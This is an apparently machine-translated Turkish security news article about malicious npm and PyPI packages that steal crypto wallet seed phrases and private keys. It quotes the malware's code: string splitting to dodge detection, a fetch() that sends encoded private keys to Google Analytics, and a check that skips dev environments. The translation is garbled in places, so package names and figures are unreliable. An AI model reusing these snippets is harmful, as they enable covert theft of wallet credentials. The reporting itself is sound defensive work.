Açık kaynaklı bir topluluk için bir gelişmede, NPM ve PYPI depoları üzerindeki birkaç kötü amaçlı paket, kripto para birimi cüzdanı kimlik bilgilerini gizlice hasat ederken meşru geliştirici araçları olarak poz verdiğinde keşfedildi.
Binlerce indirme toplu olarak biriktiren bu paketler, şüphesiz geliştiricilerden ve kullanıcılardan hassas bilgileri çalmak için sofistike teknikler gösterir.
Kötü niyetli paketler, 2021’de piyasaya sürülmesinden bu yana 2021’de yayınlanmasından bu yana, 2024’te piyasaya sürülmesinden bu yana 3.405 ve 3.425 indirme kazanmış olan iki PYPI paketinin yanı sıra 2021’de piyasaya sürülmesinden bu yana 1.215 kez indirilen React-ScrollPageviewTest’i içerir.
.png
)
Yüzeyde, bu paketler yararlı işlevsellik sunuyor gibi görünmektedir: React-anal-scrollpageViewTest, kendisini bir sayfa kaydırma yardımcı programı olarak sunar, Web3x Ethereum bakiyelerini kontrol ettiğini iddia eder ve herden cüzdan etkileşimlerini otomatikleştirme iddiaları vardır.
Socket.DEV araştırmacıları, iyi huylu cephelerinin arkasında, bu paketlerin, özel olarak anımsatıcı tohum ifadeleri ve özel anahtarlar dahil olmak üzere kripto para birimi cüzdan kimlik bilgilerini çıkarmak için tasarlanmış kötü niyetli kod içerdiğini belirlediler.
Araştırmacılar, paketlerin, çalınan kimlik bilgilerini tehdit aktörlerine iletmek için çeşitli pespiltrasyon yöntemleri kullandığını ve Pypi paketlerinin telgraf botlarını kullanırken Google Analytics’i kullanan React-ScrollPageViewTest’i kullandığını belirtti.
Bu kötü niyetli paketlerin etkisi, anında kimlik hırsızlığının ötesine uzanmaktadır. Tehdit aktörleri bir kurbanın anımsatıcı tohum ifadesi veya özel anahtarı elde ettiklerinde, ilgili tüm kripto para birimi varlıkları üzerinde tam kontrol sahibi olurlar ve bu da genellikle geri dönüşü olmayan finansal kayıplara neden olurlar.
Bir Reddit kullanıcısı, her Welletbot ile etkileşime girdikten sonra, “Tüm bakiyelerim gitti… Dengemde yaklaşık 3 sıcak ve 0.1 vardı.”
Kötü niyetli davranışlarına rağmen, bu paketler aylarca kendi depolarında kamuya açık olarak kaldı ve yazılım tedarik zincirindeki tehdit aktörleri tarafından sömürülmeye devam eden güvenlik açıklarını vurguladı.
Google Analytics aracılığıyla sofistike bir exfiltration
Reaction-ScrollPageViewTest paketi, kimlik hırsızlığı ve eksfiltrasyon için özellikle sofistike teknikler göstermektedir.
Kötü amaçlı yazılım, temel desen eşleşmesini yenmek için dize bölünmesi de dahil olmak üzere algılamadan kaçınmak için çeşitli yöntemler kullanır:-
const bu = require('b' + 'u' + 'f' + 'f' + 'e' + 'r').Buffer;Hassas cüzdan bilgilerini çıkardıktan sonra, paket çalınan verileri baz 64 kodlamadan önce rastgele bir önekle kodlar ve Google Analytics’e iletir:-
const line = "v=1&tid=UA-215070146-1&cid=" + stg +
"&t=pageview&dt=" + ec + "&dl=" + ecy(priv) + "\n";
fetch('https://www.google-analytics.com/collect', {
method:'POST', body: line, headers:{'Content-Type':'text/plain'}
});Bu eksfiltrasyon tekniği özellikle sinsidir, çünkü Google Analytics alanları kurumsal ortamlarda yaygın olarak beyaz listeye girer ve kötü amaçlı trafiğin güvenlik kontrollerini atlamasına izin verir.
Tehdit oyuncusu, Google Analytics panosunda sıradan sayfa görüntüleme verileri olarak görünen çalınan kimlik bilgilerini almak için meşru analiz altyapısını yeniden kullanır.
Paket ayrıca, geliştirme ortamlarında yürütmeyi önlemek için koşullu kontroller uygular ve tekrarlanan eksfiltrasyonu önlemek için yerel depolamayı kullanır ve algılama şansını daha da azaltır:-
if (!__DEV__ || eqx(darw) || darw.startsWith('1234')) {
return; // Avoid dev/test environments
}Bu bulgular, açık bağımlılık taramasının ve görünür meşruiyetine bakılmaksızın, tohum ifadelerini veya özel anahtarları asla herhangi bir uygulamayla paylaşmanın temel güvenlik uygulamasının kritik önemini göstermektedir.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy